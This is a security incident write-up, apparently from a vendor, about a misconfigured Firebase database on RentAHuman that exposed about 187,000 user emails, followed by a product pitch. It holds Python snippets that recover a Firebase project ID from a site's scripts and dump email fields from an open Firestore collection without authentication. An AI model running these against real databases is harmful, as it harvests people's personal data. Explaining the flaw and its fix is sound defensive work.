RentAHuman Agentic Marketplace Leak Exposes 187K User Emails
Key Takeaways
- 187,714 user email addresses exposed from the RentAHuman platform.
- Misconfigured Firebase database allowed unrestricted public access.
- AI coding assistant reportedly discovered the vulnerability within minutes.
- Exposure included Stripe customer identifiers and internal user IDs.
- Incident highlights security risks in rapidly developed AI agent ecosystems.
Misconfigured Database Exposes User Data on AI Task Platform
In March 2026, a security researcher discovered that RentAHuman, a marketplace where AI agents hire humans for real-world tasks, had exposed a large user dataset through a misconfigured Firebase database. The vulnerability allowed public access to 187,714 email addresses along with user IDs and payment identifiers. The incident underscores the security risks emerging in AI-driven platforms that combine automation, APIs, and human labor marketplaces.
What We Know
RentAHuman is an emerging platform designed to allow AI agents to outsource physical tasks to human workers. The marketplace launched in early 2026 and quickly attracted significant attention due to its unusual model: AI systems can post tasks that humans complete in the real world. (aiHola)
In March 2026, security researcher Gal Nagli demonstrated that the platform’s backend database was publicly accessible through Google Firebase. According to reports, the database contained 187,714 personal email addresses along with user IDs and Stripe customer identifiers.
The discovery was made during a security test using an AI coding assistant, which scanned the site’s JavaScript files and extracted Firebase configuration data. Once the project identifier was obtained, the researcher accessed Firestore endpoints and found that the /humans collection could be queried without authentication.
The exposed records were accessible via a simple HTTP request and required no login credentials. The vulnerability became public after the researcher shared a documented timeline of the discovery on social media.
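A read of this kind can be reproduced against Firestore's public REST API with a few lines of code. The sketch below is illustrative and assumes a world-readable database: the project identifier is a placeholder, and depending on project configuration the (non-secret) web API key recovered from the client-side Firebase config may also need to be supplied as a key query parameter.

```python
# Minimal sketch of an unauthenticated read against a world-readable Firestore
# database via the public REST API. The project ID below is a placeholder, not
# RentAHuman's real identifier.
import requests

PROJECT_ID = "example-project"  # hypothetical; recovered from the client-side Firebase config
url = (
    f"https://firestore.googleapis.com/v1/projects/{PROJECT_ID}"
    "/databases/(default)/documents/humans"
)

# If the security rules allow public reads, this succeeds with no credentials.
# Some projects also expect the web API key as ?key=<apiKey>.
resp = requests.get(url, timeout=10)
resp.raise_for_status()

# Firestore returns typed field values, e.g. {"email": {"stringValue": "..."}}.
for doc in resp.json().get("documents", []):
    print(doc.get("fields", {}).get("email", {}).get("stringValue"))
```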
The RentAHuman team was subsequently alerted to the issue and began remediation steps. However, the exposure demonstrated how rapidly an attacker or automated tool could locate and retrieve sensitive user data.
How the Breach Happened
The breach occurred because of a misconfigured cloud database combined with exposed application configuration files.
RentAHuman used Google Firebase to manage user records and other backend data. While the platform’s application API attempted to limit sensitive information returned to clients, the underlying Firestore database did not enforce proper access rules. As a result, anyone who accessed the database directly could retrieve the full dataset.
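The exact rules in place have not been published, but a common failure mode is a catch-all Firestore security rule left open during development. A configuration roughly like the following sketch (illustrative, not RentAHuman's actual rules) makes every document world-readable regardless of what the application API filters out:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Overly permissive catch-all: any client, authenticated or not,
    // can read every document, including the /humans collection.
    match /{document=**} {
      allow read: if true;
    }
  }
}
```

A least-privilege alternative would instead match /humans/{userId} and allow reads only when request.auth is present and request.auth.uid equals the document owner, so direct Firestore queries fail without a valid session.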
The discovery process illustrates how modern AI-assisted security testing can dramatically accelerate vulnerability detection. The researcher instructed an AI coding assistant to analyze the platform, which quickly scanned the website’s JavaScript files, extracted the Firebase configuration, and generated the necessary API requests to probe backend services.
Within minutes, the system discovered the publicly readable database and retrieved records containing user emails and associated identifiers.
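The configuration-extraction step is easy to sketch. Firebase web apps ship their project configuration (apiKey, projectId, and related fields) to the browser, so a simple pattern match over the site's JavaScript bundles is usually enough to recover the project identifier. The bundle URL and regular expression below are illustrative assumptions, not the researcher's actual tooling.

```python
# Illustrative reconnaissance sketch: fetch a client-side JavaScript bundle and
# look for an embedded Firebase web configuration.
import re
import requests

BUNDLE_URL = "https://example.com/static/js/main.js"  # hypothetical bundle path

js = requests.get(BUNDLE_URL, timeout=10).text

# Firebase web configs are not secret by design, so the project ID typically
# appears in plain text, e.g. projectId: "my-project-12345".
match = re.search(r'projectId\s*:\s*["\']([\w-]+)["\']', js)
if match:
    print("Firebase project ID:", match.group(1))
```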
Although no advanced exploit was required, the risk was amplified by the platform’s architecture. RentAHuman connects AI agents, human workers, and financial systems through APIs. A single misconfiguration therefore exposed sensitive data across the entire ecosystem.
This combination of rapid AI-driven development and insufficient cloud security configuration created a vulnerability that automated tools could discover almost instantly.
Why It Matters
The RentAHuman incident highlights how AI-enabled marketplaces create new security challenges at the intersection of automation, APIs, and human labor platforms.
First, the exposure involved personal data belonging to more than 187,000 users who registered on the platform to complete tasks for AI agents. Even though the leaked information primarily consisted of email addresses and identifiers, such data can enable phishing campaigns, identity attacks, or account takeover attempts.
Second, the incident demonstrates how AI tools can accelerate both defensive and offensive security workflows. In this case, an AI coding assistant identified the vulnerability in minutes. A malicious actor using similar tools could replicate the discovery process at scale across thousands of startups and AI platforms.
Third, the breach illustrates the risks of rapidly developed AI ecosystems. Many AI platforms are built quickly to experiment with new concepts such as agent-driven marketplaces. Without strong security practices, these systems can expose sensitive data before they undergo rigorous security testing.
Finally, the event raises questions about governance and accountability in AI-mediated marketplaces. Platforms that allow autonomous agents to interact with human workers must ensure that the underlying infrastructure protects both personal data and financial systems.
PointGuard AI Perspective
The RentAHuman breach demonstrates a growing trend: AI-enabled platforms dramatically expand attack surfaces while accelerating the speed at which vulnerabilities can be discovered and exploited.
PointGuard AI addresses these risks by providing security visibility and governance across the entire AI ecosystem.
First, PointGuard continuously discovers AI assets including models, agents, APIs, and MCP infrastructure across enterprise environments. This allows organizations to detect exposed services, misconfigured databases, and shadow AI deployments before attackers discover them.
Second, the platform applies context-aware policy enforcement across AI workflows. By evaluating organizational, behavioral, and situational context, PointGuard can restrict how agents access sensitive resources and data stores. This prevents unauthorized access even when underlying infrastructure contains configuration errors.
Third, PointGuard enables secure-by-design AI development practices. Development teams can manage prompt templates, agent configurations, and integration endpoints within a governed environment that enforces least-privilege access and secrets protection.
Finally, runtime monitoring helps detect anomalous agent behavior such as large-scale data extraction, automated reconnaissance, or unexpected API activity.
As AI agents become more capable and integrated into real-world workflows, organizations must treat AI systems as critical infrastructure. Security strategies must evolve beyond traditional application protection to include AI-native visibility, policy enforcement, and lifecycle governance.
Incident Scorecard Details
Total AISSI Score: 6.3 / 10
- Criticality = 6 (AISSI weighting: 25%): Exposure of user emails and identifiers from an operational AI marketplace platform.
- Propagation = 6 (AISSI weighting: 20%): Cloud database misconfiguration could affect similar AI platforms and services using shared development patterns.
- Exploitability = 7 (AISSI weighting: 15%): Publicly accessible database requiring no authentication; easily discoverable by automated scanning tools.
- Supply Chain = 7 (AISSI weighting: 15%): Platform relied heavily on third-party cloud infrastructure and integrated services, including Firebase and Stripe.
- Business Impact = 6 (AISSI weighting: 25%): Exposure of user emails and identifiers created phishing and account risk, but no confirmed financial or operational damage reported.
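For reference, the total above follows from the per-factor scores and weights in the scorecard, assuming the AISSI total is computed as a simple weighted average:

```python
# Reproduce the weighted AISSI total from the scorecard's factor scores and weights.
scores  = {"criticality": 6, "propagation": 6, "exploitability": 7,
           "supply_chain": 7, "business_impact": 6}
weights = {"criticality": 0.25, "propagation": 0.20, "exploitability": 0.15,
           "supply_chain": 0.15, "business_impact": 0.25}

total = sum(scores[k] * weights[k] for k in scores)
print(round(total, 1))  # 6.3
```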
Sources
- Blockchain.News report on RentAHuman breach: https://blockchain.news/ainews/rentahuman-data-breach-exposes-187-714-emails-ai-agent-security-analysis-and-2026-lessons
- AIhola analysis of exposed Firebase database: https://aihola.com/article/rentahuman-firebase-data-leak
- Academic analysis of the RentAHuman AI-agent marketplace: https://arxiv.org/abs/2602.19514
